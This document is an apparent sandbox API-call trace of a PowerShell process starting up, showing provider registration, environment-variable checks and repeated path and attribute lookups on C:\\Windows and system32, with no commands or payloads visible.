	[0785.084] SetErrorMode (uMode=0x1) returned 0x1
	[0785.085] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1eccf0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0785.085] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1ecba0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0785.085] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0785.085] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1ecad0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0785.085] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0785.086] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ecb20, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0785.086] SetErrorMode (uMode=0x1) returned 0x1
	[0785.086] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1ecd80 | out: lpFileInformation=0x1ecd80*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0785.086] SetErrorMode (uMode=0x1) returned 0x1
	[0785.086] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ecb20, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0785.086] SetErrorMode (uMode=0x1) returned 0x1
	[0785.086] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1ecd80 | out: lpFileInformation=0x1ecd80*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0785.086] SetErrorMode (uMode=0x1) returned 0x1
	[0785.087] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ecbc0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0785.087] SetErrorMode (uMode=0x1) returned 0x1
	[0785.087] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1ece20 | out: lpFileInformation=0x1ece20*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0785.087] SetErrorMode (uMode=0x1) returned 0x1
	[0785.087] CoTaskMemAlloc (cb=0x804) returned 0x1b3f91e0
	[0785.087] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b3f91e0, nSize=0x1ed228 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ed228) returned 0x1
	[0785.088] CoTaskMemFree (pv=0x1b3f91e0) 
	[0785.088] CoTaskMemAlloc (cb=0x204) returned 0x382120
	[0785.088] GetUserNameW (in: lpBuffer=0x382120, pcbBuffer=0x1ed268 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ed268) returned 1
	[0785.088] CoTaskMemFree (pv=0x382120) 
	[0785.088] ReportEventW (hEventLog=0x1b840008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d188d8*="FileSystem", lpRawData=0x2d18668) returned 1
	[0785.095] CoTaskMemAlloc (cb=0x104) returned 0x33a4f0
	[0785.095] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33a4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0785.095] CoTaskMemFree (pv=0x33a4f0) 
	[0785.095] CoTaskMemAlloc (cb=0x804) returned 0x1b3f91e0
	[0785.095] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b3f91e0, nSize=0x1ed228 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ed228) returned 0x1
	[0785.096] CoTaskMemFree (pv=0x1b3f91e0) 
	[0785.096] CoTaskMemAlloc (cb=0x204) returned 0x382120
	[0785.096] GetUserNameW (in: lpBuffer=0x382120, pcbBuffer=0x1ed268 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ed268) returned 1
	[0785.096] CoTaskMemFree (pv=0x382120) 
	[0785.096] ReportEventW (hEventLog=0x1b840008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d1e118*="Function", lpRawData=0x2d1dea8) returned 1
	[0785.124] CoTaskMemAlloc (cb=0x104) returned 0x33a4f0
	[0785.124] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33a4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0785.124] CoTaskMemFree (pv=0x33a4f0) 
	[0785.146] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0785.147] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1eca20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0785.147] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1eca20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0785.149] CoTaskMemAlloc (cb=0x804) returned 0x1b3f91e0
	[0785.149] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b3f91e0, nSize=0x1ed228 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ed228) returned 0x1
	[0785.151] CoTaskMemFree (pv=0x1b3f91e0) 
	[0785.151] CoTaskMemAlloc (cb=0x204) returned 0x382120
	[0785.151] GetUserNameW (in: lpBuffer=0x382120, pcbBuffer=0x1ed268 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ed268) returned 1
	[0785.151] CoTaskMemFree (pv=0x382120) 
	[0785.152] ReportEventW (hEventLog=0x1b840008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d40940*="Registry", lpRawData=0x2d406d0) returned 1
	[0785.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0785.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1eca20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0785.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1eca20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0785.158] CoTaskMemAlloc (cb=0x804) returned 0x1b3f91e0
	[0785.158] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b3f91e0, nSize=0x1ed228 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ed228) returned 0x1
	[0785.158] CoTaskMemFree (pv=0x1b3f91e0) 
	[0785.158] CoTaskMemAlloc (cb=0x204) returned 0x382120
	[0785.158] GetUserNameW (in: lpBuffer=0x382120, pcbBuffer=0x1ed268 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ed268) returned 1
	[0785.158] CoTaskMemFree (pv=0x382120) 
	[0785.159] ReportEventW (hEventLog=0x1b840008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d45d58*="Variable", lpRawData=0x2d45ae8) returned 1
	[0785.165] CoTaskMemAlloc (cb=0x104) returned 0x33a4f0
	[0785.165] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33a4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0785.165] CoTaskMemFree (pv=0x33a4f0) 
	[0785.873] CoTaskMemAlloc (cb=0x104) returned 0x33a4f0
	[0785.873] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33a4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0785.874] CoTaskMemFree (pv=0x33a4f0) 
	[0785.876] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1ecad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0785.876] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1eca20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0785.876] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1eca20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0785.877] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1eca20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0789.685] CoTaskMemAlloc (cb=0x804) returned 0x1b3fdc00
	[0789.685] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b3fdc00, nSize=0x1ed228 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ed228) returned 0x1
	[0789.685] CoTaskMemFree (pv=0x1b3fdc00) 
	[0789.686] CoTaskMemAlloc (cb=0x204) returned 0x382120
	[0789.686] GetUserNameW (in: lpBuffer=0x382120, pcbBuffer=0x1ed268 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ed268) returned 1
	[0789.686] CoTaskMemFree (pv=0x382120) 
	[0789.686] ReportEventW (hEventLog=0x1b840008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d59970*="Certificate", lpRawData=0x2d59700) returned 1
	[0790.047] CoTaskMemAlloc (cb=0x104) returned 0x33a4f0
	[0790.047] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33a4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0790.047] CoTaskMemFree (pv=0x33a4f0) 
	[0790.049] CoTaskMemAlloc (cb=0x20e) returned 0x3d2d10
	[0790.049] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x3d2d10 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0790.049] CoTaskMemFree (pv=0x3d2d10) 
	[0790.050] CoTaskMemAlloc (cb=0x104) returned 0x33a4f0
	[0790.050] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33a4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0790.050] CoTaskMemFree (pv=0x33a4f0) 
	[0790.050] CoTaskMemAlloc (cb=0x104) returned 0x33a4f0
	[0790.050] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33a4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0790.051] CoTaskMemFree (pv=0x33a4f0) 
	[0790.068] CoTaskMemAlloc (cb=0x104) returned 0x33a4f0
	[0790.068] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33a4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0790.069] CoTaskMemFree (pv=0x33a4f0) 
	[0790.072] CoTaskMemAlloc (cb=0x104) returned 0x33a4f0
	[0790.073] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33a4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0790.073] CoTaskMemFree (pv=0x33a4f0) 
	[0790.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1ecc10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0790.074] SetErrorMode (uMode=0x1) returned 0x1
	[0790.074] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1ece70 | out: lpFileInformation=0x1ece70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0790.074] SetErrorMode (uMode=0x1) returned 0x1
	[0790.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1ecc10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0790.074] SetErrorMode (uMode=0x1) returned 0x1
	[0790.074] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1ece70 | out: lpFileInformation=0x1ece70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0790.074] SetErrorMode (uMode=0x1) returned 0x1
	[0790.075] CoTaskMemAlloc (cb=0x104) returned 0x33a4f0
	[0790.076] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33a4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0790.076] CoTaskMemFree (pv=0x33a4f0) 
	[0790.078] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1ecdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0790.078] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ecc20, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0790.079] SetErrorMode (uMode=0x1) returned 0x1
	[0790.079] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1ece30 | out: lpFileInformation=0x1ece30*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0790.079] SetErrorMode (uMode=0x1) returned 0x1
	[0790.079] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ecc20, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0790.079] SetErrorMode (uMode=0x1) returned 0x1
	[0790.079] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1ece30 | out: lpFileInformation=0x1ece30*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0790.079] SetErrorMode (uMode=0x1) returned 0x1
	[0790.079] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ecc30, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0790.079] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1ecb20, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0790.080] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1ecc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0790.080] SetErrorMode (uMode=0x1) returned 0x1
	[0790.080] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1ece30 | out: lpFileInformation=0x1ece30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0790.080] SetErrorMode (uMode=0x1) returned 0x1
	[0790.080] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1ecc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0790.080] SetErrorMode (uMode=0x1) returned 0x1
	[0790.080] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1ece30 | out: lpFileInformation=0x1ece30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0790.080] SetErrorMode (uMode=0x1) returned 0x1
	[0791.095] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1ecc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0791.095] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x1ecb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0791.095] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1ecc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0791.095] SetErrorMode (uMode=0x1) returned 0x1
	[0791.095] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1ece30 | out: lpFileInformation=0x1ece30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0791.096] SetErrorMode (uMode=0x1) returned 0x1
	[0791.096] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1ecc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0791.096] SetErrorMode (uMode=0x1) returned 0x1
	[0791.096] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1ece30 | out: lpFileInformation=0x1ece30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0791.096] SetErrorMode (uMode=0x1) returned 0x1
	[0791.096] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1ecc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0791.096] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x1ecb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0791.097] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1ecc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0791.097] SetErrorMode (uMode=0x1) returned 0x1
	[0791.097] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1ece70 | out: lpFileInformation=0x1ece70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0791.097] SetErrorMode (uMode=0x1) returned 0x1
	[0791.097] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1ecc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0791.097] SetErrorMode (uMode=0x1) returned 0x1
	[0791.097] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1ece70 | out: lpFileInformation=0x1ece70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0791.097] SetErrorMode (uMode=0x1) returned 0x1
	[0791.098] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1ecc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0791.098] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x1ecb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0791.098] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1ecc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0791.098] SetErrorMode (uMode=0x1) returned 0x1
	[0791.098] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1ece70 | out: lpFileInformation=0x1ece70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0791.098] SetErrorMode (uMode=0x1) returned 0x1
	[0791.098] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1ecc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0791.098] SetErrorMode (uMode=0x1) returned 0x1
	[0791.099] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1ece70 | out: lpFileInformation=0x1ece70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0791.099] SetErrorMode (uMode=0x1) returned 0x1
	[0791.099] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1ecc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0791.099] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x1ecb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
